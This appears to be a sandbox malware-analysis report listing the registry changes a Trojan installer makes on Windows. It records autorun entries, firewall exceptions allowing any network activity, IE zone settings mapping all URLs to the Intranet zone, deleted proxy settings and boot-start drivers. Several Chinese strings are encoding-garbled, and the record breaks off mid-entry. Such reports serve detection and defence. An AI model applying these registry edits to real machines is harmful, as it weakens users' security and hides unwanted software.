[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process pczh_107_306.exe:828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\°®Çé.ÖÇ»Û.5.2]
"DisplayIcon" = "%Program Files%\ainqngz5.2\uninstall.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\°®Çé.ÖÇ»Û.5.2]
"DisplayVersion" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\°®Çé.ÖÇ»Û.5.2]
"DisplayName" = "°®Çé.ÖÇ»Û5.2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKLM\SOFTWARE\dsrs]
"et" = "2014-8-17"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Ainqngz5.2.exe]
"(Default)" = "%Program Files%\ainqngz5.2\Ainqngz5.2.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\dsrs]
"EX" = "1"
"ED" = "107"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\°®Çé.ÖÇ»Û.5.2]
"UninstallString" = "%Program Files%\ainqngz5.2\uninstall.exe"
[HKLM\SOFTWARE\dsrs]
"EN" = "pczh_107_306.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D0 24 7D D0 AD FB 86 51 91 39 16 F0 CA 30 BA 85"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
The process baiduanTray.exe:2772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC EC 8F E5 61 89 CD 3E EE 9C 04 20 BE 33 1A CF"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Baidu\BaiduAn]
"PAUTime" = "1800000"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
The process spkjrjp_30279.exe:1632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 74 40 8A 66 32 9C FD 13 60 E5 0A 5B 55 82 A2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp]
"spkjrjp_30279.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\spkjrjp_30279.exe:*:Enabled:百度æÂ€毒在线安装程åºÂÂ"
The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp]
"spkjrjp_30279.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\spkjrjp_30279.exe:*:Enabled:百度æÂ€毒在线安装程åºÂÂ"
The process yymusic05.exe:2308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 D8 36 0B 6B C0 73 CF B0 62 9B C7 38 0B 4F 8F"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\yyfm0529]
"RD" = "_2014081705"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"yyfm0529_2014081705" = "%Program Files%\yyfm0529\2014081705\yymusic05.exe -mini"
"yyfm0529_News_2014081705" = "%Program Files%\yyfm0529\2014081705\YFMSever.exe -mini"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"
"AutoConfigURL"
The Trojan disables automatic startup of the application by deleting the following autorun value:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BoxNews"
"yyfm0529_News"
"YyfmPlay"
"yyfm0529"
The process regsvr32.exe:3184 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF 5C E4 36 66 50 F5 4A 72 B7 19 7F 1C B3 FE E2"
[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}]
"(Default)" = "IDownloader_2"
[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\InProcServer32]
"ThreadingModel" = "Both"
[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "PSFactoryBuffer"
[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}\ProxyStubClsid32]
"(Default)" = "{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}"
[HKCR\CLSID\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\InProcServer32]
"(Default)" = "c:\program files\common files\baidu\bddownload\107\bdcomproxy.dll"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "IDownloader"
[HKCR\Interface\{6B3732AA-F6D4-4F16-9E22-49EDC52C9514}\NumMethods]
"(Default)" = "6"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\NumMethods]
"(Default)" = "15"
[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid32]
"(Default)" = "{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}"
The process BDALeakfixer.exe:3640 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E E2 8C 48 C3 C8 8F FA E9 34 86 F7 6D 36 73 6A"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process BaiduAn.exe:3516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 30 5E 0B 56 B9 66 18 AE B4 6F 82 2C 23 D8 63"
The process BaiduAn.exe:3208 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D6 D9 26 7C 37 15 32 2B 04 B5 39 7F 5B DB 86 7C"
The process BaiduAnSvc.exe:3884 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F8 66 6A F8 AB 67 FE 92 BE 38 93 EE 0F 8F 41 13"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bddriver" = "02 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\System\CurrentControlSet\Services\BDMWrench]
"Type" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\System\CurrentControlSet\Services\BDMWrench]
"DisplayName" = "BDMWrench"
"ErrorControl" = "0"
[HKLM\System\CurrentControlSet\Services\BDMRTP]
"ImagePath" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnSvc.exe -r"
[HKLM\System\CurrentControlSet\Services\BDMWrench]
"Tag" = "5"
"Group" = "bddriver"
"ImagePath" = "system32\DRIVERS\BDMWrench.sys"
[HKU\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ParseAutoexec" = "1"
[HKLM\System\CurrentControlSet\Services\BDMWrench]
"Description" = "BDMWrench"
The following driver will be automatically launched by the NT Native code (IoInitSystem method):
[HKLM\System\CurrentControlSet\Services\BDMWrench]
"Start" = "1"
[HKLM\System\CurrentControlSet\Services\BDEnhanceBoost]
"Start" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BaiduAnTray" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnTray.exe -stmd=3"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\Services\BDMWrench\Security]
[HKLM\System\CurrentControlSet\Services\BDMWrench]
[HKLM\System\CurrentControlSet\Services\BDMWrench\Enum]
The Trojan deletes the following value(s) in system registry:
[HKLM\System\CurrentControlSet\Services\BDMWrench]
"DeleteFlag"
The process BaiduAnSvc.exe:3732 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 A2 73 A3 03 16 9B 36 DB 96 76 52 45 0A D2 12"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process oovmdw_70745.exe:444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度å«士]
"Publisher" = "百度在线网络技术(åŒâ€â€ÃƒÂ¤Ã‚ºÂ¬Ã¯Â¼â€°Ã¦Å“䎪ÂÂå…¬å¸"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度å«士]
"DisplayVersion" = "2.3.0.2225"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Baidu\BaiduAn\2.3.0.2225]
"BaiduAnSvc.exe" = "百度å«士æœÂÂ务程åºÂÂ"
[HKLM\System\CurrentControlSet\Services\BDMNetMon]
"Type" = "1"
"DisplayName" = "BDMNetMon"
[HKLM\System\CurrentControlSet\Services\bd0001]
"Type" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度å«士]
"DisplayIcon" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\app.ico"
[HKLM\SOFTWARE\Baidu\BaiduAn]
"InstallDate" = "2014-8-17"
[HKLM\System\CurrentControlSet\Services\bd0002]
"Tag" = "2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"Tag" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCR\Unknown\shell\openas\command]
"DelegateExecute" = ""
[HKLM\System\CurrentControlSet\Services\BDArKit]
"ErrorControl" = "0"
"Description" = "BDArKit"
[HKCR\metnsd\clsid]
"SequenceID" = "FB 55 2E A1 EA F0 0A 44 8F E2 56 75 C3 E3 C7 3D"
[HKLM\SOFTWARE\Baidu\BaiduAn]
"VirusTime" = "2013.04.05 1216"
[HKLM\System\CurrentControlSet\Services\bd0002]
"Type" = "1"
[HKCR\Unknown\shell\openas\command]
"(Default)" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDAFileHelper.exe -file=%1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\System\CurrentControlSet\Services\BDMNetMon]
"Tag" = "3"
[HKLM\SOFTWARE\Baidu\BaiduAn]
"INSTLANG" = "2052"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Baidu\BaiduAn]
"Version" = "2.3.0.2225"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "06 30 C9 7B 65 74 2D 3E B4 A2 0A A5 D2 8E 5C 53"
[HKLM\System\CurrentControlSet\Services\bd0001]
"DisplayName" = "bd0001"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"Group" = "bddriver"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Baidu\BaiduAn\2.3.0.2225]
"bddownloader.exe" = "百度高速下载引擎"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度å«士]
"UninstallString" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\uninst.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\bd0001]
"Tag" = "1"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"ImagePath" = "system32\DRIVERS\BDArKit.sys"
[HKLM\SOFTWARE\Baidu\BaiduAn]
"RtpFlag" = "273"
[HKLM\System\CurrentControlSet\Services\bd0002]
"DisplayName" = "bd0002"
"ErrorControl" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\System\CurrentControlSet\Services\bd0002]
"Group" = "bddriver"
[HKLM\System\CurrentControlSet\Services\bd0001]
"ImagePath" = "system32\DRIVERS\bd0001.sys"
[HKLM\System\CurrentControlSet\Services\BDMNetMon]
"ImagePath" = "system32\DRIVERS\BDMNetMon.sys"
"ErrorControl" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\bd0001]
"ErrorControl" = "0"
[HKLM\System\CurrentControlSet\Services\bd0002]
"Description" = "bd0002"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"Type" = "1"
[HKLM\SOFTWARE\Baidu\BaiduAn]
"SupplyID" = "70745"
"InstallDir" = "%Program Files%\Baidu\BaiduAn"
[HKLM\System\CurrentControlSet\Services\BDMNetMon]
"Description" = "BDMNetMon"
[HKLM\System\CurrentControlSet\Services\bd0002]
"ImagePath" = "system32\DRIVERS\bd0002.sys"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"bddriver" = "02 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\System\CurrentControlSet\Services\bd0002]
"InstallDir_gj" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\百度å«士]
"DisplayName" = "百度å«士2.3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Services\BDMNetMon]
"Group" = "bddriver"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"DisplayName" = "BDArKit"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\System\CurrentControlSet\Control\ServiceGroupOrder]
"List" = "System Reserved, Boot Bus Extender, System Bus Extender, SCSI miniport, Port, Primary Disk, SCSI Class, SCSI CDROM Class, FSFilter Infrastructure, FSFilter System, FSFilter Bottom, FSFilter Copy Protection, FSFilter Security Enhancer, FSFilter Open File, FSFilter Physical Quota Management, FSFilter Encryption, FSFilter Compression, FSFilter HSM, FSFilter Cluster File System, FSFilter System Recovery, FSFilter Quota Management, FSFilter Content Screener, FSFilter Continuous Backup, FSFilter Replication, FSFilter Anti-Virus, FSFilter Undelete, bddriver, FSFilter Activity Monitor, FSFilter Top, Filter, Boot File System, Base, Pointer Port, Keyboard Port, Pointer Class, Keyboard Class, Video Init, Video, Video Save, File System, Event Log, Streams Drivers, NDIS Wrapper, COM Infrastructure, UIGroup, LocalValidation, PlugPlay, PNP_TDI, NDIS, TDI, NetBIOSGroup, ShellSvcGroup, SchedulerGroup, SpoolerGroup, AudioGroup, SmartCardGroup, NetworkProvider, RemoteValidation, NetDDEGroup, Parallel arbitrator, Extended Base, PCI Configuration, MS Transactions"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Baidu\BaiduAn\2.3.0.2225]
"BaiduAn.exe" = "百度å«士主程åºÂÂ"
[HKLM\System\CurrentControlSet\Services\bd0001]
"Group" = "bddriver"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Baidu\BaiduAn\2.3.0.2225]
"vcredist_x86.exe" = "IExpress Setup"
[HKLM\System\CurrentControlSet\Services\bd0001]
"Description" = "bd0001"
The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\Baidu\BaiduAn\2.3.0.2225]
"BaiduAnSvc.exe" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnSvc.exe:*:Enabled:百度å«士æœÂÂ务程åºÂÂ"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\updatr]
"oovmdw_70745.exe" = "%Program Files%\updatr\oovmdw_70745.exe:*:Enabled:百度å«士在线安装程åºÂÂ"
The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp]
"snczjmr.dll" = "%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\snczjmr.dll:*:Enabled:百度å«士安装程åºÂÂ"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Baidu\BaiduAn\2.3.0.2225]
"BaiduAnSvc.exe" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnSvc.exe:*:Enabled:百度å«士æœÂÂ务程åºÂÂ"
The following service will be launched automatically at system boot up:
[HKLM\System\CurrentControlSet\Services\BDMNetMon]
"Start" = "2"
The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\updatr]
"oovmdw_70745.exe" = "%Program Files%\updatr\oovmdw_70745.exe:*:Enabled:百度å«士在线安装程åºÂÂ"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\Baidu\BaiduAn\2.3.0.2225]
"BaiduAnUpdate.exe" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnUpdate.exe:*:Enabled:百度å«士更新程åºÂÂ"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Baidu\BaiduAn\2.3.0.2225]
"BaiduAnTray.exe" = "%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnTray.exe:*:Enabled:百度å«士托盘程åºÂÂ"
The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\Baidu\BaiduAn\2.3.0.2225]
